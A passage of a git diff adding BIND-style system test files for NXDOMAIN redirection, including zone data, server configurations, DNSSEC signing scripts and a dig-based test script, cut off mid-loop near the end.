$zone) +key2=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -fk $zone) + +cat $infile $key1.key $key2.key > $zonefile + +$SIGNER -P -g -o $zone $zonefile > /dev/null + +zone=nsec3 +infile=example.db +zonefile=nsec3.db + +key1=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -3 $zone) +key2=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -3 -fk $zone) + +cat $infile $key1.key $key2.key > $zonefile + +$SIGNER -P -3 - -g -o $zone $zonefile > /dev/null diff --git a/bin/tests/system/redirect/ns4/example.db.in b/bin/tests/system/redirect/ns4/example.db.in new file mode 100644 index 0000000..8057d1b --- /dev/null +++ b/bin/tests/system/redirect/ns4/example.db.in @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA ns.example.net hostmaster.example.net 0 0 0 0 0 +@ NS ns4 +ns4 A 10.53.0.4 +a A 10.53.0.2 diff --git a/bin/tests/system/redirect/ns4/named.conf.in b/bin/tests/system/redirect/ns4/named.conf.in new file mode 100644 index 0000000..698d5a4 --- /dev/null +++ b/bin/tests/system/redirect/ns4/named.conf.in @@ -0,0 +1,51 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +controls { /* empty */ }; + +acl rfc1918 { 10/8; 192.168/16; 172.16/12; }; + +options { + query-source address 10.53.0.2; /* note this is not 10.53.0.4 */ + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion yes; + notify yes; + dnssec-validation yes; + nxdomain-redirect "redirect"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type hint; + file "root.hint"; +}; + +zone "example" { + type primary; + file "example.db"; +}; diff --git a/bin/tests/system/redirect/ns4/root.hint b/bin/tests/system/redirect/ns4/root.hint new file mode 100644 index 0000000..3889a8b --- /dev/null +++ b/bin/tests/system/redirect/ns4/root.hint @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 999999 +. IN NS a.root-servers.nil. +a.root-servers.nil. IN A 10.53.0.3 diff --git a/bin/tests/system/redirect/ns5/named.conf.in b/bin/tests/system/redirect/ns5/named.conf.in new file mode 100644 index 0000000..74df436 --- /dev/null +++ b/bin/tests/system/redirect/ns5/named.conf.in @@ -0,0 +1,32 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS5 + +options { + port @PORT@; + listen-on port @PORT@ { 10.53.0.5; }; + pid-file "named.pid"; + nxdomain-redirect signed; +}; + +zone "." { + type primary; + file "root.db.signed"; +}; + +// An unsigned zone that ns6 has a delegation for. +zone "unsigned." { + type primary; + file "unsigned.db"; +}; diff --git a/bin/tests/system/redirect/ns5/root.db.in b/bin/tests/system/redirect/ns5/root.db.in new file mode 100644 index 0000000..19aa61d --- /dev/null +++ b/bin/tests/system/redirect/ns5/root.db.in @@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +. 86400 IN SOA a.root-servers.nil. hostmaster.example.net. 2019022100 1800 900 604800 86400 +. 518400 IN NS a.root-servers.nil. +a.root-servers.nil. 518400 IN A 10.53.0.5 +signed. 172800 IN NS ns.signed. +ns.signed. 172800 IN A 10.53.0.6 +unsigned. 172800 IN NS ns.unsigned. +ns.unsigned. 172800 IN A 10.53.0.5 diff --git a/bin/tests/system/redirect/ns5/sign.sh b/bin/tests/system/redirect/ns5/sign.sh new file mode 100644 index 0000000..efa986a --- /dev/null +++ b/bin/tests/system/redirect/ns5/sign.sh @@ -0,0 +1,45 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +# We sign the zone here and move the signed zone to ns6. +# The ns5 server actually does not serve this zone but +# the DS and NS records are in the test root zone, and +# delegate to ns6. +zone=signed. +infile=signed.db.in +zonefile=signed.db + +key1=$($KEYGEN -q -a $DEFAULT_ALGORITHM -b $DEFAULT_BITS $zone 2> /dev/null) +key2=$($KEYGEN -q -a $DEFAULT_ALGORITHM -b $DEFAULT_BITS -fk $zone 2> /dev/null) + +cat $infile $key1.key $key2.key > $zonefile + +$SIGNER -P -g -O full -o $zone $zonefile > sign.ns5.signed.out + +cp signed.db.signed ../ns6 + +# Root zone. +zone=. +infile=root.db.in +zonefile=root.db + +key1=$($KEYGEN -q -a $DEFAULT_ALGORITHM -b $DEFAULT_BITS $zone 2> /dev/null) +key2=$($KEYGEN -q -a $DEFAULT_ALGORITHM -b $DEFAULT_BITS -fk $zone 2> /dev/null) + +# cat $infile $key1.key $key2.key > $zonefile +cat $infile dsset-signed. $key1.key $key2.key > $zonefile + +$SIGNER -P -g -O full -o $zone $zonefile > sign.ns5.root.out diff --git a/bin/tests/system/redirect/ns5/signed.db.in b/bin/tests/system/redirect/ns5/signed.db.in new file mode 100644 index 0000000..6579227 --- /dev/null +++ b/bin/tests/system/redirect/ns5/signed.db.in @@ -0,0 +1,20 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA ns.signed. hostmaster.signed. 0 0 0 0 0 +@ IN NS ns.signed. + +ns.signed. IN A 10.0.53.6 +domain.signed. IN A 10.0.53.1 + +* IN A 100.100.100.1 +* IN AAAA 2001:ffff:ffff::100.100.100.1 diff --git a/bin/tests/system/redirect/ns5/unsigned.db b/bin/tests/system/redirect/ns5/unsigned.db new file mode 100644 index 0000000..10e06ff --- /dev/null +++ b/bin/tests/system/redirect/ns5/unsigned.db @@ -0,0 +1,20 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +@ IN SOA ns.unsigned. hostmaster.unsigned. 0 0 0 0 0 +@ IN NS ns.unsigned. + +ns.unsigned. IN A 10.53.0.6 +domain.unsigned. IN A 10.0.53.1 + +* IN A 100.100.100.1 +* IN AAAA 2001:ffff:ffff::100.100.100.1 diff --git a/bin/tests/system/redirect/ns6/named.conf.in b/bin/tests/system/redirect/ns6/named.conf.in new file mode 100644 index 0000000..d211715 --- /dev/null +++ b/bin/tests/system/redirect/ns6/named.conf.in @@ -0,0 +1,32 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS6 + +options { + port @PORT@; + listen-on port @PORT@ { 10.53.0.6; }; + pid-file "named.pid"; + nxdomain-redirect unsigned; +}; + +zone "." { + type primary; + file "root.db"; +}; + +// A signed zone that ns5 has a delegation for. +zone "signed." { + type primary; + file "signed.db.signed"; +}; diff --git a/bin/tests/system/redirect/ns6/root.db b/bin/tests/system/redirect/ns6/root.db new file mode 100644 index 0000000..a8e6a45 --- /dev/null +++ b/bin/tests/system/redirect/ns6/root.db @@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +. 86400 IN SOA a.root-servers.nil. hostmaster.example.net. 2019022100 1800 900 604800 86400 +. 518400 IN NS a.root-servers.nil. +a.root-servers.nil. 518400 IN A 10.53.0.6 +signed. 172800 IN NS ns.signed. +ns.signed. 172800 IN A 10.53.0.6 +unsigned. 172800 IN NS ns.unsigned. +ns.unsigned. 172800 IN A 10.53.0.5 diff --git a/bin/tests/system/redirect/setup.sh b/bin/tests/system/redirect/setup.sh new file mode 100644 index 0000000..29a75b7 --- /dev/null +++ b/bin/tests/system/redirect/setup.sh @@ -0,0 +1,30 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf +copy_setports ns4/named.conf.in ns4/named.conf +copy_setports ns5/named.conf.in ns5/named.conf +copy_setports ns6/named.conf.in ns6/named.conf + +cp ns2/redirect.db.in ns2/redirect.db +cp ns2/example.db.in ns2/example.db +( cd ns1 && $SHELL sign.sh ) + +cp ns4/example.db.in ns4/example.db +( cd ns3 && $SHELL sign.sh ) +( cd ns5 && $SHELL sign.sh ) diff --git a/bin/tests/system/redirect/tests.sh b/bin/tests/system/redirect/tests.sh new file mode 100644 index 0000000..f56b85f --- /dev/null +++ b/bin/tests/system/redirect/tests.sh @@ -0,0 +1,539 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=1 + +rm -f dig.out.* + +DIGOPTS="+tcp +noadd +nosea +nostat +nocmd -p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +for conf in conf/good*.conf +do + echo_i "checking that $conf is accepted ($n)" + ret=0 + $CHECKCONF "$conf" || ret=1 + n=`expr $n + 1` + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +done + +for conf in conf/bad*.conf +do + echo_i "checking that $conf is rejected ($n)" + ret=0 + $CHECKCONF "$conf" >/dev/null && ret=1 + n=`expr $n + 1` + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +done + +echo_i "checking A zone redirect works for nonexist ($n)" +ret=0 +$DIG $DIGOPTS nonexist. @10.53.0.2 -b 10.53.0.2 a > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "100.100.100.1" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A zone redirect updates statistics ($n)" +ret=0 +rm ns2/named.stats 2>/dev/null +$RNDCCMD 10.53.0.2 stats || ret=1 +PRE=`tr -d '\r' < ns2/named.stats | sed -n -e "s/[ ]*\([0-9]*\).queries resulted in NXDOMAIN that were redirected$/\1/p"` +$DIG $DIGOPTS nonexist. @10.53.0.2 -b 10.53.0.2 a > dig.out.ns2.test$n || ret=1 +rm ns2/named.stats 2>/dev/null +$RNDCCMD 10.53.0.2 stats || ret=1 +POST=`tr -d '\r' < ns2/named.stats | sed -n -e "s/[ ]*\([0-9]*\).queries resulted in NXDOMAIN that were redirected$/\1/p"` +if [ `expr $POST - $PRE` != 1 ]; then ret=1; fi +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA zone redirect works for nonexist ($n)" +ret=0 +$DIG $DIGOPTS nonexist. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:ffff:ffff::6464:6401" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking ANY zone redirect works for nonexist ($n)" +ret=0 +$DIG $DIGOPTS nonexist. @10.53.0.2 -b 10.53.0.2 any > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "100.100.100.1" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:ffff:ffff::6464:6401" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A zone redirect doesn't work for acl miss ($n)" +ret=0 +$DIG $DIGOPTS nonexist. @10.53.0.2 -b 10.53.0.4 a > dig.out.ns2.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1 +grep "100.100.100.1" dig.out.ns2.test$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA zone redirect doesn't work for acl miss ($n)" +ret=0 +$DIG $DIGOPTS nonexist. @10.53.0.2 -b 10.53.0.4 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:ffff:ffff::6464:6401" dig.out.ns2.test$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking ANY zone redirect doesn't work for acl miss ($n)" +ret=0 +$DIG $DIGOPTS nonexist. @10.53.0.2 -b 10.53.0.4 any > dig.out.ns2.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1 +grep "100.100.100.1" dig.out.ns2.test$n > /dev/null && ret=1 +grep "2001:ffff:ffff::6464:6401" dig.out.ns2.test$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A zone redirect works for signed nonexist, DO=0 ($n)" +ret=0 +$DIG $DIGOPTS nonexist.signed. @10.53.0.2 -b 10.53.0.2 a > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "100.100.100.1" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA zone redirect works for signed nonexist, DO=0 ($n)" +ret=0 +$DIG $DIGOPTS nonexist.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:ffff:ffff::6464:6401" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking ANY zone redirect works for signed nonexist, DO=0 ($n)" +ret=0 +$DIG $DIGOPTS nonexist.signed. @10.53.0.2 -b 10.53.0.2 any > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "100.100.100.1" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:ffff:ffff::6464:6401" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A zone redirect fails for signed nonexist, DO=1 ($n)" +ret=0 +$DIG $DIGOPTS nonexist.signed. +dnssec @10.53.0.2 -b 10.53.0.2 a > dig.out.ns2.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1 +grep "100.100.100.1" dig.out.ns2.test$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA zone redirect fails for signed nonexist, DO=1 ($n)" +ret=0 +$DIG $DIGOPTS nonexist.signed. +dnssec @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:ffff:ffff::6464:6401" dig.out.ns2.test$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking ANY zone redirect fails for signed nonexist, DO=1 ($n)" +ret=0 +$DIG $DIGOPTS nonexist.signed. +dnssec @10.53.0.2 -b 10.53.0.2 any > dig.out.ns2.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1 +grep "100.100.100.1" dig.out.ns2.test$n > /dev/null && ret=1 +grep "2001:ffff:ffff::6464:6401" dig.out.ns2.test$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A zone redirect fails for nsec3 signed nonexist, DO=1 ($n)" +ret=0 +$DIG $DIGOPTS nonexist.nsec3. +dnssec @10.53.0.2 -b 10.53.0.2 a > dig.out.ns2.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1 +grep "100.100.100.1" dig.out.ns2.test$n > /dev/null && ret=1 +grep "IN.NSEC3" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA zone redirect fails for nsec3 signed nonexist, DO=1 ($n)" +ret=0 +$DIG $DIGOPTS nonexist.nsec3. +dnssec @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:ffff:ffff::6464:6401" dig.out.ns2.test$n > /dev/null && ret=1 +grep "IN.NSEC3" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking ANY zone redirect fails for nsec3 signed nonexist, DO=1 ($n)" +ret=0 +$DIG $DIGOPTS nonexist.nsec3. +dnssec @10.53.0.2 -b 10.53.0.2 any > dig.out.ns2.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1 +grep "100.100.100.1" dig.out.ns2.test$n > /dev/null && ret=1 +grep "2001:ffff:ffff::6464:6401" dig.out.ns2.test$n > /dev/null && ret=1 +grep "IN.NSEC3" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A zone redirect works for nonexist authoritative ($n)" +ret=0 +$DIG $DIGOPTS nonexist. @10.53.0.1 -b 10.53.0.1 a > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "100.100.100.2" dig.out.ns1.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA zone redirect works for nonexist authoritative ($n)" +ret=0 +$DIG $DIGOPTS nonexist. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "2001:ffff:ffff::6464:6402" dig.out.ns1.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking ANY zone redirect works for nonexist authoritative ($n)" +ret=0 +$DIG $DIGOPTS nonexist. @10.53.0.1 -b 10.53.0.1 any > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "100.100.100.2" dig.out.ns1.test$n > /dev/null || ret=1 +grep "2001:ffff:ffff::6464:6402" dig.out.ns1.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A zone redirect doesn't work for acl miss authoritative ($n)" +ret=0 +$DIG $DIGOPTS nonexist. @10.53.0.1 -b 10.53.0.4 a > dig.out.ns1.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns1.test$n > /dev/null || ret=1 +grep "100.100.100.2" dig.out.ns1.test$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA zone redirect doesn't work for acl miss authoritative ($n)" +ret=0 +$DIG $DIGOPTS nonexist. @10.53.0.1 -b 10.53.0.4 aaaa > dig.out.ns1.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns1.test$n > /dev/null || ret=1 +grep "2001:ffff:ffff::6464:6402" dig.out.ns1.test$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking ANY zone redirect doesn't work for acl miss authoritative ($n)" +ret=0 +$DIG $DIGOPTS nonexist. @10.53.0.1 -b 10.53.0.4 any > dig.out.ns1.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns1.test$n > /dev/null || ret=1 +grep "100.100.100.2" dig.out.ns1.test$n > /dev/null && ret=1 +grep "2001:ffff:ffff::6464:6402" dig.out.ns1.test$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A zone redirect works for signed nonexist, DO=0 authoritative ($n)" +ret=0 +$DIG $DIGOPTS nonexist.signed. @10.53.0.1 -b 10.53.0.1 a > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "100.100.100.2" dig.out.ns1.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA zone redirect works for signed nonexist, DO=0 authoritative ($n)" +ret=0 +$DIG $DIGOPTS nonexist.signed. @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "2001:ffff:ffff::6464:6402" dig.out.ns1.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking ANY zone redirect works for signed nonexist, DO=0 authoritative ($n)" +ret=0 +$DIG $DIGOPTS nonexist.signed. @10.53.0.1 -b 10.53.0.1 any > dig.out.ns1.test$n || ret=1 +grep "status: NOERROR" dig.out.ns1.test$n > /dev/null || ret=1 +grep "100.100.100.2" dig.out.ns1.test$n > /dev/null || ret=1 +grep "2001:ffff:ffff::6464:6402" dig.out.ns1.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A zone redirect fails for signed nonexist, DO=1 authoritative ($n)" +ret=0 +$DIG $DIGOPTS nonexist.signed. +dnssec @10.53.0.1 -b 10.53.0.1 a > dig.out.ns1.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns1.test$n > /dev/null || ret=1 +grep "100.100.100.2" dig.out.ns1.test$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA zone redirect fails for signed nonexist, DO=1 authoritative ($n)" +ret=0 +$DIG $DIGOPTS nonexist.signed. +dnssec @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns1.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns1.test$n > /dev/null || ret=1 +grep "2001:ffff:ffff::6464:6402" dig.out.ns1.test$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking ANY zone redirect fails for signed nonexist, DO=1 authoritative ($n)" +ret=0 +$DIG $DIGOPTS nonexist.signed. +dnssec @10.53.0.1 -b 10.53.0.1 any > dig.out.ns1.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns1.test$n > /dev/null || ret=1 +grep "100.100.100.2" dig.out.ns1.test$n > /dev/null && ret=1 +grep "2001:ffff:ffff::6464:6402" dig.out.ns1.test$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A zone redirect fails for nsec3 signed nonexist, DO=1 authoritative ($n)" +ret=0 +$DIG $DIGOPTS nonexist.nsec3. +dnssec @10.53.0.1 -b 10.53.0.1 a > dig.out.ns1.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns1.test$n > /dev/null || ret=1 +grep "100.100.100.2" dig.out.ns1.test$n > /dev/null && ret=1 +grep "IN.NSEC3" dig.out.ns1.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA zone redirect fails for nsec3 signed nonexist, DO=1 authoritative ($n)" +ret=0 +$DIG $DIGOPTS nonexist.nsec3. +dnssec @10.53.0.1 -b 10.53.0.1 aaaa > dig.out.ns1.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns1.test$n > /dev/null || ret=1 +grep "2001:ffff:ffff::6464:6402" dig.out.ns1.test$n > /dev/null && ret=1 +grep "IN.NSEC3" dig.out.ns1.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking ANY zone redirect fails for nsec3 signed nonexist, DO=1 authoritative ($n)" +ret=0 +$DIG $DIGOPTS nonexist.nsec3. +dnssec @10.53.0.1 -b 10.53.0.1 any > dig.out.ns1.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns1.test$n > /dev/null || ret=1 +grep "100.100.100.2" dig.out.ns1.test$n > /dev/null && ret=1 +grep "2001:ffff:ffff::6464:6402" dig.out.ns1.test$n > /dev/null && ret=1 +grep "IN.NSEC3" dig.out.ns1.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking zone redirect works (with noerror) when qtype is not found ($n)" +ret=0 +$DIG $DIGOPTS nonexist. @10.53.0.2 -b 10.53.0.2 txt > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking that redirect zones reload correctly" +ret=0 +sleep 1 # ensure file mtime will have changed +tr -d '\r' < ns2/example.db.in | sed -e 's/0 0 0 0 0/1 0 0 0 0/' > ns2/example.db +tr -d '\r' < ns2/redirect.db.in | sed -e 's/0 0 0 0 0/1 0 0 0 0/' -e 's/\.1$/.2/' > ns2/redirect.db +rndc_reload ns2 10.53.0.2 +for i in 1 2 3 4 5 6 7 8 9; do + tmp=0 + 